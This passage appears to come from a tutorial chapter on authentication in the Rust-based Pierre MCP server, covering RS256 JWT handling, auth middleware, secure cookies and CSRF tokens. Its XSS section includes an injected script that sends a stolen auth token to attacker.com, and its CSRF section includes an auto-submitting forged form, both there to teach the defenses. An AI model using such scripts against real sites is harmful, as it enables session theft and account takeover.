iat: now.timestamp(),
exp: expiry.timestamp(),
iss: crate::constants::service_names::PIERRE_MCP_SERVER.to_owned(),
jti: Uuid::new_v4().to_string(),
providers: scopes.to_vec(),
aud: crate::constants::service_names::MCP.to_owned(),
tenant_id,
};
// Get active RSA key from JWKS manager
let active_key = jwks_manager.get_active_key()?;
let encoding_key = active_key.encoding_key()?;
// Create RS256 header with kid
let mut header = Header::new(Algorithm::RS256);
header.kid = Some(active_key.kid.clone());
let token = encode(&header, &claims, &encoding_key)?;
Ok(token)
}
}
OAuth tokens use the providers claim to store granted scopes (e.g., ["read:activities", "write:workouts"]). This allows the platform to enforce fine-grained permissions without database lookups.
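A scope check against that claim is then a pure in-memory membership test (this helper is illustrative, not a function from the Pierre codebase):

```rust
// Check a required scope against the granted-scope list carried in the
// token's providers claim - no database lookup needed.
fn has_scope(granted: &[String], required: &str) -> bool {
    granted.iter().any(|scope| scope == required)
}

fn main() {
    let granted = vec!["read:activities".to_owned(), "write:workouts".to_owned()];
    assert!(has_scope(&granted, "read:activities"));
    assert!(!has_scope(&granted, "admin:users"));
}
```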
Token Validation and Error Handling
Token validation verifies the RS256 signature and checks expiration, audience, and issuer claims.
RS256 Signature Verification
The platform uses the kid from the token header to look up the correct public key:
Source: src/auth.rs:256-292
#![allow(unused)]
fn main() {
/// Validate a RS256 JWT token using JWKS public keys
///
/// # Errors
///
/// Returns an error if:
/// - Token signature is invalid
/// - Token has expired
/// - Token is malformed or not valid JWT format
/// - Token header doesn't contain kid (key ID)
/// - JWKS manager doesn't have the specified key
/// - Token claims cannot be deserialized
pub fn validate_token(
&self,
token: &str,
jwks_manager: &crate::admin::jwks::JwksManager,
) -> Result<Claims> {
// Extract kid from token header
let header = jsonwebtoken::decode_header(token)?;
let kid = header.kid.ok_or_else(|| -> anyhow::Error {
AppError::auth_invalid("Token header missing kid (key ID)").into()
})?;
tracing::debug!("Validating RS256 JWT token with kid: {}", kid);
// Get public key from JWKS manager
let key_pair = jwks_manager.get_key(&kid).ok_or_else(|| -> anyhow::Error {
AppError::auth_invalid(format!("Key not found in JWKS: {kid}")).into()
})?;
let decoding_key =
key_pair
.decoding_key()
.map_err(|e| JwtValidationError::TokenInvalid {
reason: format!("Failed to get decoding key: {e}"),
})?;
let mut validation = Validation::new(Algorithm::RS256);
validation.validate_exp = true;
validation.set_audience(&[crate::constants::service_names::MCP]);
validation.set_issuer(&[crate::constants::service_names::PIERRE_MCP_SERVER]);
let token_data = decode::<Claims>(token, &decoding_key, &validation).map_err(|e| {
tracing::error!("RS256 JWT validation failed: {:?}", e);
e
})?;
Ok(token_data.claims)
}
}
Key rotation support: The kid lookup allows the platform to rotate RSA keys without invalidating existing tokens. Tokens signed with old keys remain valid as long as the old key pair exists in JWKS.
Rust Idiom: ok_or_else(|| -> anyhow::Error { ... })
This pattern converts Option<T> to Result<T, E> with lazy error construction. The closure only executes if the option is None, avoiding unnecessary allocations for successful cases.
Detailed Validation Errors
The platform provides detailed error messages for debugging token issues:
Source: src/auth.rs:44-104
#![allow(unused)]
fn main() {
/// JWT validation error with detailed information
#[derive(Debug, Clone)]
pub enum JwtValidationError {
/// Token has expired
TokenExpired {
/// When the token expired
expired_at: DateTime<Utc>,
/// Current time for reference
current_time: DateTime<Utc>,
},
/// Token signature is invalid
TokenInvalid {
/// Reason for invalidity
reason: String,
},
/// Token is malformed (not proper JWT format)
TokenMalformed {
/// Details about malformation
details: String,
},
}
impl std::fmt::Display for JwtValidationError {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::TokenExpired {
expired_at,
current_time,
} => {
let duration_expired = current_time.signed_duration_since(*expired_at);
if duration_expired.num_minutes() < 60 {
write!(
f,
"JWT token expired {} minutes ago at {}",
duration_expired.num_minutes(),
expired_at.format("%Y-%m-%d %H:%M:%S UTC")
)
} else if duration_expired.num_hours() < USER_SESSION_EXPIRY_HOURS {
write!(
f,
"JWT token expired {} hours ago at {}",
duration_expired.num_hours(),
expired_at.format("%Y-%m-%d %H:%M:%S UTC")
)
} else {
write!(
f,
"JWT token expired {} days ago at {}",
duration_expired.num_days(),
expired_at.format("%Y-%m-%d %H:%M:%S UTC")
)
}
}
Self::TokenInvalid { reason } => {
write!(f, "JWT token signature is invalid: {reason}")
}
Self::TokenMalformed { details } => {
write!(f, "JWT token is malformed: {details}")
}
}
}
}
}
User experience: Human-readable error messages help developers debug authentication issues. For example, “JWT token expired 3 hours ago at 2025-01-15 14:30:00 UTC” is more actionable than “Token expired”.
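The tiered minutes/hours/days wording reduces to simple integer arithmetic. A sketch of that logic (function name is ours; we assume a 24-hour boundary for the hours tier, where the real code uses USER_SESSION_EXPIRY_HOURS):

```rust
// Tiered expiry message in the style of JwtValidationError::Display.
fn expiry_message(seconds_ago: i64) -> String {
    let minutes = seconds_ago / 60;
    if minutes < 60 {
        format!("JWT token expired {minutes} minutes ago")
    } else if minutes < 24 * 60 {
        format!("JWT token expired {} hours ago", minutes / 60)
    } else {
        format!("JWT token expired {} days ago", minutes / (24 * 60))
    }
}

fn main() {
    assert_eq!(expiry_message(5 * 60), "JWT token expired 5 minutes ago");
    assert_eq!(expiry_message(180 * 60), "JWT token expired 3 hours ago");
    assert_eq!(expiry_message(3 * 24 * 60 * 60), "JWT token expired 3 days ago");
}
```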
Expiration Checking
The platform separates signature verification from expiration checking for better error messages:
Source: src/auth.rs:381-421
#![allow(unused)]
fn main() {
/// Decode RS256 JWT token claims without expiration validation
fn decode_token_claims(
token: &str,
jwks_manager: &crate::admin::jwks::JwksManager,
) -> Result<Claims, JwtValidationError> {
// Extract kid from token header
let header =
jsonwebtoken::decode_header(token).map_err(|e| JwtValidationError::TokenMalformed {
details: format!("Failed to decode token header: {e}"),
})?;
let kid = header
.kid
.ok_or_else(|| JwtValidationError::TokenMalformed {
details: "Token header missing kid (key ID)".to_owned(),
})?;
// Get public key from JWKS manager
let key_pair =
jwks_manager
.get_key(&kid)
.ok_or_else(|| JwtValidationError::TokenInvalid {
reason: format!("Key not found in JWKS: {kid}"),
})?;
let decoding_key =
key_pair
.decoding_key()
.map_err(|e| JwtValidationError::TokenInvalid {
reason: format!("Failed to get decoding key: {e}"),
})?;
let mut validation_no_exp = Validation::new(Algorithm::RS256);
validation_no_exp.validate_exp = false;
validation_no_exp.set_audience(&[crate::constants::service_names::MCP]);
validation_no_exp.set_issuer(&[crate::constants::service_names::PIERRE_MCP_SERVER]);
decode::<Claims>(token, &decoding_key, &validation_no_exp)
.map(|token_data| token_data.claims)
.map_err(|e| Self::convert_jwt_error(&e))
}
}
Design pattern: Decode first with validate_exp = false, then check expiration manually. This allows detailed expiration errors while still verifying the signature for refresh tokens.
Source: src/auth.rs:423-438
#![allow(unused)]
fn main() {
/// Validate claims expiration with detailed logging
fn validate_claims_expiry(claims: &Claims) -> Result<(), JwtValidationError> {
let current_time = Utc::now();
let expired_at = DateTime::from_timestamp(claims.exp, 0).unwrap_or_else(Utc::now);
tracing::debug!(
"Token validation details - User: {}, Issued: {}, Expires: {}, Current: {}",
claims.sub,
DateTime::from_timestamp(claims.iat, 0)
.map_or_else(|| "unknown".into(), |d| d.to_rfc3339()),
expired_at.to_rfc3339(),
current_time.to_rfc3339()
);
Self::check_token_expiry(claims, current_time, expired_at)
}
}
Session Management and Token Refresh
The platform creates sessions after successful authentication and supports token refresh for better user experience.
Session Creation
Source: src/auth.rs:449-464
#![allow(unused)]
fn main() {
/// Create a user session from a valid user with RS256 token
///
/// # Errors
///
/// Returns an error if:
/// - JWT token generation fails
/// - User data is invalid
/// - System time is unavailable
/// - JWKS manager has no active key
pub fn create_session(
&self,
user: &User,
jwks_manager: &crate::admin::jwks::JwksManager,
) -> Result<UserSession> {
let jwt_token = self.generate_token(user, jwks_manager)?;
let expires_at = Utc::now() + Duration::hours(self.token_expiry_hours);
Ok(UserSession {
user_id: user.id,
jwt_token,
expires_at,
email: user.email.clone(),
available_providers: user.available_providers(),
})
}
}
The UserSession struct contains everything a client needs to interact with the API:
- jwt_token: RS256-signed JWT for authentication
- expires_at: When the token becomes invalid
- available_providers: Which fitness providers the user has connected
Token Refresh Pattern
Source: src/auth.rs:515-529
#![allow(unused)]
fn main() {
/// Refresh a token if it's still valid (RS256)
///
/// # Errors
///
/// Returns an error if:
/// - Old token signature is invalid (even if expired)
/// - Token is malformed
/// - New token generation fails
/// - User data is invalid
/// - JWKS manager has no active key
pub fn refresh_token(
&self,
old_token: &str,
user: &User,
jwks_manager: &crate::admin::jwks::JwksManager,
) -> Result<String> {
// First validate the old token signature (even if expired)
// This ensures the refresh request is legitimate
Self::decode_token_claims(old_token, jwks_manager).map_err(|e| -> anyhow::Error {
AppError::auth_invalid(format!("Failed to validate old token for refresh: {e}")).into()
})?;
// Generate new token - atomic counter ensures uniqueness
self.generate_token(user, jwks_manager)
}
}
Security: The refresh pattern validates the old token’s signature even if expired. This prevents attackers from forging expired tokens to request new ones.
Rust Idiom: Decode without expiration check (decode_token_claims) ensures legitimate expired tokens can be refreshed while forged tokens are rejected.
Middleware-Based Authentication
The platform uses middleware to authenticate MCP requests with both JWT tokens and API keys.
Request Authentication Flow
┌──────────────────────────────────────────────────────────────┐
│ MCP Request │
│ │
│ Authorization: Bearer eyJhbGc... or pk_live_abc123... │
└────────────────────────┬─────────────────────────────────────┘
│
▼
┌──────────────────────────┐
│ McpAuthMiddleware │
│ │
│ authenticate_request() │
└──────────────────────────┘
│
┌────────────┴────────────┐
│ │
▼ ▼
┌───────────────┐ ┌──────────────┐
│ JWT Token │ │ API Key │
│ (Bearer) │ │ (pk_live_) │
└───────────────┘ └──────────────┘
│ │
▼ ▼
┌───────────────┐ ┌──────────────┐
│ validate_token│ │ hash + lookup│
│ with JWKS │ │ in database │
└───────────────┘ └──────────────┘
│ │
└────────────┬────────────┘
▼
┌──────────────┐
│ AuthResult │
│ │
│ - user_id │
│ - tier │
│ - rate_limit│
└──────────────┘
Source: src/middleware/auth.rs:65-136
#![allow(unused)]
fn main() {
#[tracing::instrument(
skip(self, auth_header),
fields(
auth_method = tracing::field::Empty,
user_id = tracing::field::Empty,
tenant_id = tracing::field::Empty,
success = tracing::field::Empty,
)
)]
pub async fn authenticate_request(&self, auth_header: Option<&str>) -> Result<AuthResult> {
tracing::debug!("=== AUTH MIDDLEWARE AUTHENTICATE_REQUEST START ===");
tracing::debug!("Auth header provided: {}", auth_header.is_some());
let auth_str = if let Some(header) = auth_header {
// Security: Do not log auth header content to prevent token leakage
tracing::debug!(
"Authentication attempt with header type: {}",
if header.starts_with(key_prefixes::API_KEY_LIVE) {
"API_KEY"
} else if header.starts_with("Bearer ") {
"JWT_TOKEN"
} else {
"UNKNOWN"
}
);
header
} else {
tracing::warn!("Authentication failed: Missing authorization header");
return Err(auth_error("Missing authorization header - Request authentication requires Authorization header with Bearer token or API key").into());
};
// Try API key authentication first (starts with pk_live_)
if auth_str.starts_with(key_prefixes::API_KEY_LIVE) {
tracing::Span::current().record("auth_method", "API_KEY");
tracing::debug!("Attempting API key authentication");
match self.authenticate_api_key(auth_str).await {
Ok(result) => {
tracing::Span::current()
.record("user_id", result.user_id.to_string())
.record("tenant_id", result.user_id.to_string()) // Use user_id as tenant_id for now
.record("success", true);
tracing::info!(
"API key authentication successful for user: {}",
result.user_id
);
Ok(result)
}
Err(e) => {
tracing::Span::current().record("success", false);
tracing::warn!("API key authentication failed: {}", e);
Err(e)
}
}
}
// Then try Bearer token authentication
else if let Some(token) = auth_str.strip_prefix("Bearer ") {
tracing::Span::current().record("auth_method", "JWT_TOKEN");
tracing::debug!("Attempting JWT token authentication");
match self.authenticate_jwt_token(token).await {
Ok(result) => {
tracing::Span::current()
.record("user_id", result.user_id.to_string())
.record("tenant_id", result.user_id.to_string()) // Use user_id as tenant_id for now
.record("success", true);
tracing::info!("JWT authentication successful for user: {}", result.user_id);
Ok(result)
}
Err(e) => {
tracing::Span::current().record("success", false);
tracing::warn!("JWT authentication failed: {}", e);
Err(e)
}
}
} else {
tracing::Span::current()
.record("auth_method", "INVALID")
.record("success", false);
tracing::warn!("Authentication failed: Invalid authorization header format (expected 'Bearer ...' or 'pk_live_...')");
Err(AppError::auth_invalid("Invalid authorization header format - must be 'Bearer <token>' or 'pk_live_<api_key>'").into())
}
}
}
Rust Idiom: #[tracing::instrument(skip(self, auth_header), fields(...))]
This attribute automatically creates a tracing span for the function with structured fields. The skip(self, auth_header) prevents logging sensitive data (JWT tokens). The empty fields get populated dynamically using record().
Security: The middleware logs authentication attempts without exposing token contents, balancing observability with security.
JWT Authentication in Middleware
Source: src/middleware/auth.rs:194-228
#![allow(unused)]
fn main() {
/// Authenticate using RS256 JWT token
async fn authenticate_jwt_token(&self, token: &str) -> Result<AuthResult> {
let claims = self
.auth_manager
.validate_token_detailed(token, &self.jwks_manager)?;
let user_id = crate::utils::uuid::parse_uuid(&claims.sub)
.map_err(|_| AppError::auth_invalid("Invalid user ID in token"))?;
// Get user from database to check tier and rate limits
let user = self
.database
.get_user(user_id)
.await?
.ok_or_else(|| AppError::not_found(format!("User {user_id}")))?;
// Get current usage for rate limiting
let current_usage = self.database.get_jwt_current_usage(user_id).await?;
let rate_limit = self
.rate_limit_calculator
.calculate_jwt_rate_limit(&user, current_usage);
// Check rate limit
if rate_limit.is_rate_limited {
return Err(auth_error("JWT token rate limit exceeded").into());
}
Ok(AuthResult {
user_id,
auth_method: AuthMethod::JwtToken {
tier: format!("{:?}", user.tier).to_lowercase(),
},
rate_limit,
})
}
}
The middleware:
- Validates token signature with RS256 using JWKS
- Extracts user ID from the sub claim
- Calculates rate limit based on tier and current usage
- Returns
AuthResultwith user context and rate limit info
Authentication Result
Source: src/auth.rs:133-158
#![allow(unused)]
fn main() {
/// Authentication result with user context and rate limiting info
#[derive(Debug)]
pub struct AuthResult {
/// Authenticated user ID
pub user_id: Uuid,
/// Authentication method used
pub auth_method: AuthMethod,
/// Rate limit information (always provided for both API keys and JWT tokens)
pub rate_limit: UnifiedRateLimitInfo,
}
/// Authentication method used
#[derive(Debug, Clone)]
pub enum AuthMethod {
/// JWT token authentication
JwtToken {
/// User tier for rate limiting
tier: String,
},
/// API key authentication
ApiKey {
/// API key ID
key_id: String,
/// API key tier
tier: String,
},
}
}
The AuthResult provides downstream handlers with:
- user_id: For database queries and multi-tenant isolation
- auth_method: For logging and analytics
- rate_limit: For enforcing API usage limits
Real-World Usage Patterns
Admin API Authentication
Source: src/admin/jwt.rs:190-251
#![allow(unused)]
fn main() {
/// Token generation configuration
#[derive(Debug, Clone)]
pub struct TokenGenerationConfig {
/// Service name for the token
pub service_name: String,
/// Optional human-readable description
pub service_description: Option<String>,
/// Permissions granted to this token
pub permissions: Option<AdminPermissions>,
/// Token expiration in days (None for no expiration)
pub expires_in_days: Option<u64>,
/// Whether this is a super admin token with full privileges
pub is_super_admin: bool,
}
impl TokenGenerationConfig {
/// Create config for regular admin token
#[must_use]
pub fn regular_admin(service_name: String) -> Self {
Self {
service_name,
service_description: None,
permissions: Some(AdminPermissions::default_admin()),
expires_in_days: Some(365), // 1 year
is_super_admin: false,
}
}
/// Create config for super admin token
#[must_use]
pub fn super_admin(service_name: String) -> Self {
Self {
service_name,
service_description: Some("Super Admin Token".into()),
permissions: Some(AdminPermissions::super_admin()),
expires_in_days: None, // Never expires
is_super_admin: true,
}
}
/// Get effective permissions
#[must_use]
pub fn get_permissions(&self) -> AdminPermissions {
self.permissions.as_ref().map_or_else(
|| {
if self.is_super_admin {
AdminPermissions::super_admin()
} else {
AdminPermissions::default_admin()
}
},
std::clone::Clone::clone,
)
}
/// Get expiration date
#[must_use]
pub fn get_expiration(&self) -> Option<DateTime<Utc>> {
self.expires_in_days
.map(|days| Utc::now() + Duration::days(i64::try_from(days).unwrap_or(365)))
}
}
}
Builder pattern: The TokenGenerationConfig provides constructor methods (regular_admin, super_admin) for common configurations while allowing custom settings.
OAuth Token Generation
The platform generates OAuth access tokens for external client applications:
Source: src/auth.rs:624-668
#![allow(unused)]
fn main() {
/// Generate client credentials token with RS256 asymmetric signing
///
/// This method uses RSA private key from JWKS manager for token signing.
/// Clients can verify tokens using the public key from /.well-known/jwks.json
///
/// # Errors
///
/// Returns an error if:
/// - JWT token generation fails
/// - System time is unavailable
/// - JWKS manager has no active key
pub fn generate_client_credentials_token(
&self,
jwks_manager: &crate::admin::jwks::JwksManager,
client_id: &str,
scopes: &[String],
tenant_id: Option<String>,
) -> Result<String> {
let now = Utc::now();
let expiry = now + Duration::hours(1); // 1 hour for client credentials
let claims = Claims {
sub: format!("client:{client_id}"),
email: "client_credentials".to_owned(),
iat: now.timestamp(),
exp: expiry.timestamp(),
iss: crate::constants::service_names::PIERRE_MCP_SERVER.to_owned(),
jti: Uuid::new_v4().to_string(),
providers: scopes.to_vec(),
aud: crate::constants::service_names::MCP.to_owned(),
tenant_id,
};
// Get active RSA key from JWKS manager
let active_key = jwks_manager.get_active_key()?;
let encoding_key = active_key.encoding_key()?;
// Create RS256 header with kid
let mut header = Header::new(Algorithm::RS256);
header.kid = Some(active_key.kid.clone());
let token = encode(&header, &claims, &encoding_key)?;
Ok(token)
}
}
Note: Client credentials tokens use sub: format!("client:{client_id}") to distinguish them from user tokens. The client: prefix allows middleware to apply different authorization rules for machine-to-machine vs user authentication.
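Middleware can branch on that prefix with a single strip (the helper name is ours, not from the Pierre codebase):

```rust
// Distinguish machine clients from users by the "client:" sub prefix.
// Returns the client ID for client-credentials tokens, None for user tokens.
fn client_id_from_sub(sub: &str) -> Option<&str> {
    sub.strip_prefix("client:")
}

fn main() {
    assert_eq!(client_id_from_sub("client:my-agent"), Some("my-agent"));
    // A user token's sub is a bare UUID, so no prefix matches
    assert_eq!(
        client_id_from_sub("550e8400-e29b-41d4-a716-446655440000"),
        None
    );
}
```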
Web Application Security: Cookies and CSRF
For web applications (browser-based clients), Pierre implements secure cookie-based authentication with CSRF protection to prevent XSS and CSRF attacks.
The XSS Problem with localStorage
Storing JWT tokens in localStorage creates an XSS vulnerability:
// ❌ VULNERABLE: localStorage accessible to JavaScript
localStorage.setItem('auth_token', jwt);
// Attacker can inject script:
<script>
fetch('https://attacker.com/steal', {
body: localStorage.getItem('auth_token')
});
</script>
Problem: Any JavaScript code (including malicious scripts from XSS) can read localStorage. If an attacker injects JavaScript (via XSS vulnerability), they can steal the authentication token.
The httpOnly Cookie Solution
httpOnly cookies are inaccessible to JavaScript:
#![allow(unused)]
fn main() {
/// Set secure authentication cookie with httpOnly flag
pub fn set_auth_cookie(headers: &mut HeaderMap, token: &str, max_age_secs: i64) {
let cookie = format!(
"auth_token={}; HttpOnly; Secure; SameSite=Strict; Max-Age={}; Path=/",
token, max_age_secs
);
headers.insert(
header::SET_COOKIE,
HeaderValue::from_str(&cookie).unwrap(),
);
}
}
Source: src/security/cookies.rs:15-25
Cookie security flags:
- HttpOnly: Browser prevents JavaScript access (XSS protection)
- Secure: Cookie only sent over HTTPS (prevents network sniffing)
- SameSite=Strict: Cookie not sent on cross-origin requests (CSRF mitigation)
- Max-Age=86400: Cookie expires after 24 hours (matches JWT expiry)
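The flag combination can be verified in isolation by rebuilding the cookie string with a plain format!, mirroring set_auth_cookie above (stdlib only, no axum types):

```rust
/// Re-creates the cookie string from `set_auth_cookie` so each
/// security attribute can be checked without a web framework.
fn build_auth_cookie(token: &str, max_age_secs: i64) -> String {
    format!(
        "auth_token={token}; HttpOnly; Secure; SameSite=Strict; Max-Age={max_age_secs}; Path=/"
    )
}

fn main() {
    let cookie = build_auth_cookie("eyJhbGc...", 86_400);
    // Every attribute from the list above must be present
    for flag in ["HttpOnly", "Secure", "SameSite=Strict", "Max-Age=86400"] {
        assert!(cookie.contains(flag), "missing flag: {flag}");
    }
}
```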
CSRF Protection with Double-Submit Cookies
httpOnly cookies solve XSS token theft, but cookie-based authentication remains vulnerable to CSRF. An attacker's site can trigger authenticated requests because browsers automatically include cookies:
<!-- Attacker's site: attacker.com -->
<form action="https://pierre.example.com/api/something" method="POST">
<input type="hidden" name="data" value="malicious">
</form>
<script>document.forms[0].submit();</script>
Problem: Browser automatically includes auth_token cookie with cross-origin request.
Solution: CSRF tokens using double-submit cookie pattern.
CSRF Token Manager
Source: src/security/csrf.rs:18-58
#![allow(unused)]
fn main() {
/// CSRF token manager with user-scoped validation
pub struct CsrfTokenManager {
/// Map of CSRF tokens to (user_id, expiry)
tokens: Arc<RwLock<HashMap<String, (Uuid, DateTime<Utc>)>>>,
}
impl CsrfTokenManager {
/// Generate cryptographically secure CSRF token
pub async fn generate_token(&self, user_id: Uuid) -> AppResult<String> {
// 256-bit (32 byte) random token
let mut token_bytes = [0u8; 32];
rand::thread_rng().fill_bytes(&mut token_bytes);
let token = hex::encode(token_bytes);
// Store token with 30-minute expiration
let expiry = Utc::now() + Duration::minutes(30);
let mut tokens = self.tokens.write().await;
tokens.insert(token.clone(), (user_id, expiry));
Ok(token)
}
/// Validate CSRF token for specific user
pub async fn validate_token(&self, token: &str, user_id: Uuid) -> AppResult<()> {
let tokens = self.tokens.read().await;
let (stored_user_id, expiry) = tokens
.get(token)
.ok_or_else(|| AppError::unauthorized("Invalid CSRF token"))?;
// Check token belongs to this user
if *stored_user_id != user_id {
return Err(AppError::unauthorized("CSRF token user mismatch"));
}
// Check token not expired
if *expiry < Utc::now() {
return Err(AppError::unauthorized("CSRF token expired"));
}
Ok(())
}
}
}
Implementation notes:
- User-scoped tokens: Token validation requires matching user_id from JWT. Attacker cannot use victim’s CSRF token even if stolen.
- Cryptographic randomness: 256-bit tokens (32 bytes) provide sufficient entropy to prevent brute force.
- Short expiration: 30-minute lifetime limits exposure window. JWT tokens last 24 hours, CSRF tokens expire sooner.
- In-memory storage: HashMap provides fast lookups. For distributed systems, use Redis instead.
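The source shown above inserts tokens but does not show how expired entries are purged. A sketch of a cleanup sweep, using std types (`Instant`, a plain `HashMap`) in place of the real manager's chrono timestamps, user UUIDs, and tokio RwLock:

```rust
use std::collections::HashMap;
use std::time::{Duration, Instant};

/// Sweep expired entries out of an in-memory CSRF token store.
/// Simplified: keys map to (user id, expiry) as in the real manager,
/// but with u64 user ids and Instant expiries for a stdlib-only sketch.
fn sweep_expired(tokens: &mut HashMap<String, (u64, Instant)>) {
    let now = Instant::now();
    tokens.retain(|_token, (_user_id, expiry)| *expiry > now);
}

fn main() {
    let mut tokens = HashMap::new();
    let now = Instant::now();
    // Fresh token: 30 minutes of validity remaining
    tokens.insert("live".to_string(), (1, now + Duration::from_secs(1800)));
    // Token whose expiry has already passed by the time we sweep
    tokens.insert("dead".to_string(), (2, now));
    sweep_expired(&mut tokens);
    assert!(tokens.contains_key("live"));
    assert!(!tokens.contains_key("dead"));
}
```

Running such a sweep periodically (or lazily on each generate call) keeps the map from growing without bound.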
CSRF Middleware Validation
Source: src/middleware/csrf.rs:45-91
#![allow(unused)]
fn main() {
impl CsrfMiddleware {
/// Validate CSRF token for state-changing operations
pub async fn validate_csrf(
&self,
headers: &HeaderMap,
method: &Method,
user_id: Uuid,
) -> AppResult<()> {
// Skip CSRF validation for safe methods
if !Self::requires_csrf_validation(method) {
return Ok(());
}
// Extract CSRF token from X-CSRF-Token header
let csrf_token = headers
.get("X-CSRF-Token")
.and_then(|v| v.to_str().ok())
.ok_or_else(|| AppError::unauthorized("Missing CSRF token"))?;
// Validate token belongs to this user
self.manager.validate_token(csrf_token, user_id).await
}
/// Check if HTTP method requires CSRF validation
pub fn requires_csrf_validation(method: &Method) -> bool {
matches!(
method,
&Method::POST | &Method::PUT | &Method::DELETE | &Method::PATCH
)
}
}
}
Rust idiom: matches! macro provides pattern matching for HTTP methods without verbose == comparisons.
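The same check can be exercised standalone. This sketch uses a minimal stand-in enum for the HTTP method type (the real code uses the framework's `Method`):

```rust
/// Minimal stand-in for an HTTP method type.
#[derive(Debug, PartialEq)]
#[allow(dead_code)]
enum Method {
    Get,
    Head,
    Options,
    Post,
    Put,
    Delete,
    Patch,
}

/// Safe methods (GET/HEAD/OPTIONS) skip CSRF; state-changing ones don't.
fn requires_csrf_validation(method: &Method) -> bool {
    matches!(
        method,
        Method::Post | Method::Put | Method::Delete | Method::Patch
    )
}

fn main() {
    assert!(requires_csrf_validation(&Method::Post));
    assert!(!requires_csrf_validation(&Method::Get));
    assert!(!requires_csrf_validation(&Method::Options));
}
```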
Authentication Flow with Cookies and CSRF
login handler (POST /api/auth/login):
Source: src/routes/auth.rs:1044-1088
#![allow(unused)]
fn main() {
pub async fn handle_login(
State(resources): State<Arc<ServerResources>>,
Json(request): Json<LoginRequest>,
) -> Result<Response, AppError> {
// 1. Authenticate user (verify password)
let user = resources.database.get_user_by_email(&request.email).await?;
verify_password(&request.password, &user.password_hash)?;
// 2. Generate JWT token
let jwt_token = resources
.auth_manager
.generate_token_rs256(&resources.jwks_manager, &user.id, &user.email, providers)
.context("Failed to generate JWT token")?;
// 3. Generate CSRF token
let csrf_token = resources.csrf_manager.generate_token(user.id).await?;
// 4. Set secure cookies
let mut headers = HeaderMap::new();
set_auth_cookie(&mut headers, &jwt_token, 86400); // 24 hours
set_csrf_cookie(&mut headers, &csrf_token, 1800); // 30 minutes
// 5. Return JSON response with CSRF token
let response = LoginResponse {
jwt_token: Some(jwt_token), // backward compatibility
csrf_token,
user: UserInfo { id: user.id, email: user.email },
expires_at: Utc::now() + Duration::hours(24),
};
Ok((StatusCode::OK, headers, Json(response)).into_response())
}
}
Flow breakdown:
- Authenticate user: Verify email/password using Argon2 or bcrypt
- Generate JWT: Create RS256-signed token with 24-hour expiry
- Generate CSRF token: Create 256-bit random token with 30-minute expiry
- Set cookies: Both auth_token (httpOnly) and csrf_token (readable) cookies
- Return CSRF in JSON: Frontend needs CSRF token to include in X-CSRF-Token header
authenticated request validation:
#![allow(unused)]
fn main() {
async fn protected_handler(
State(resources): State<Arc<ServerResources>>,
headers: HeaderMap,
) -> Result<Response, AppError> {
// 1. Extract JWT from auth_token cookie
let auth_result = resources
.auth_middleware
.authenticate_request_with_headers(&headers)
.await?;
// 2. Validate CSRF token for POST/PUT/DELETE/PATCH
resources
.csrf_middleware
.validate_csrf(&headers, &Method::POST, auth_result.user_id)
.await?;
// 3. Process authenticated request
// ...
}
}
Source: src/middleware/auth.rs:318-356
Middleware tries multiple authentication methods:
- Cookie-based: Extract JWT from the auth_token cookie (preferred for web apps)
- Bearer token: Extract from the Authorization: Bearer <token> header (API clients)
- API key: Extract from the X-API-Key header (service-to-service)
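The fallback order can be sketched with a plain map standing in for a real header type. The helper name is ours; the header and cookie names are the ones listed above:

```rust
use std::collections::HashMap;

/// Try cookie, then Bearer token, then API key, mirroring the
/// middleware's fallback order. Illustrative sketch, not the real API.
fn extract_credential<'a>(headers: &HashMap<&str, &'a str>) -> Option<(&'static str, &'a str)> {
    // 1. Cookie-based: JWT inside the auth_token cookie (web apps)
    if let Some(cookie) = headers.get("Cookie") {
        if let Some(tok) = cookie
            .split(';')
            .map(str::trim)
            .find_map(|kv| kv.strip_prefix("auth_token="))
        {
            return Some(("cookie", tok));
        }
    }
    // 2. Bearer token from the Authorization header (API clients)
    if let Some(tok) = headers
        .get("Authorization")
        .and_then(|v| v.strip_prefix("Bearer "))
    {
        return Some(("bearer", tok));
    }
    // 3. API key header (service-to-service)
    headers.get("X-API-Key").map(|k| ("api_key", *k))
}

fn main() {
    let mut headers: HashMap<&str, &str> = HashMap::new();
    headers.insert("Cookie", "csrf_token=abc; auth_token=jwt123");
    headers.insert("X-API-Key", "key-9");
    // The cookie wins because it is tried before the API key
    assert_eq!(extract_credential(&headers), Some(("cookie", "jwt123")));
    headers.remove("Cookie");
    assert_eq!(extract_credential(&headers), Some(("api_key", "key-9")));
}
```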
Frontend Integration Example
axios configuration:
// Enable automatic cookie handling
axios.defaults.withCredentials = true;
// Request interceptor: add CSRF token to state-changing requests
axios.interceptors.request.use((config) => {
if (['POST', 'PUT', 'DELETE', 'PATCH'].includes(config.method?.toUpperCase() || '')) {
const csrfToken = getCsrfToken();
if (csrfToken && config.headers) {
config.headers['X-CSRF-Token'] = csrfToken;
}
}
return config;
});
login flow:
async function login(email: string, password: string) {
const response = await axios.post('/api/auth/login', { email, password });
// Store CSRF token in memory (cookies set automatically by browser)
setCsrfToken(response.data.csrf_token);
// Store user info in localStorage (not sensitive)
localStorage.setItem('user', JSON.stringify(response.data.user));
return response.data;
}
Why this works:
- Browser automatically sends the auth_token and csrf_token cookies with every request
- Frontend explicitly includes the X-CSRF-Token header for state-changing requests
- Attacker's site cannot read the CSRF token (cross-origin restriction)
- Attacker cannot forge valid CSRF token (cryptographic randomness)
Security Model Summary
| Attack Type | Protection Mechanism |
|---|---|
| XSS token theft | httpOnly cookies (JavaScript cannot read auth_token) |
| CSRF | double-submit cookie pattern (X-CSRF-Token header required) |
| Network sniffing | Secure flag (cookies only sent over HTTPS) |
| Cross-site access | SameSite=Strict (cookies not sent on cross-origin requests) |
| Token injection | User-scoped CSRF validation (token tied to user_id in JWT) |
| Replay attacks | CSRF token expiration (30-minute lifetime) |
Design tradeoff: CSRF tokens expire after 30 minutes, requiring periodic refresh. This trades convenience for security - shorter CSRF lifetime limits exposure window.
Rust idiom: Cookie and CSRF managers use Arc<RwLock<HashMap>> for concurrent access. RwLock allows multiple readers or single writer, optimizing for read-heavy token validation workload.
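The same read-heavy pattern can be shown with std's synchronous RwLock (the server uses tokio's async RwLock, but the read/write semantics match):

```rust
use std::collections::HashMap;
use std::sync::{Arc, RwLock};
use std::thread;

/// One writer inserts a token; several reader threads then validate
/// concurrently under shared read locks. Returns the value all
/// readers observed.
fn read_after_write() -> u64 {
    let tokens: Arc<RwLock<HashMap<String, u64>>> = Arc::new(RwLock::new(HashMap::new()));
    // Single writer: inserting takes the exclusive lock briefly
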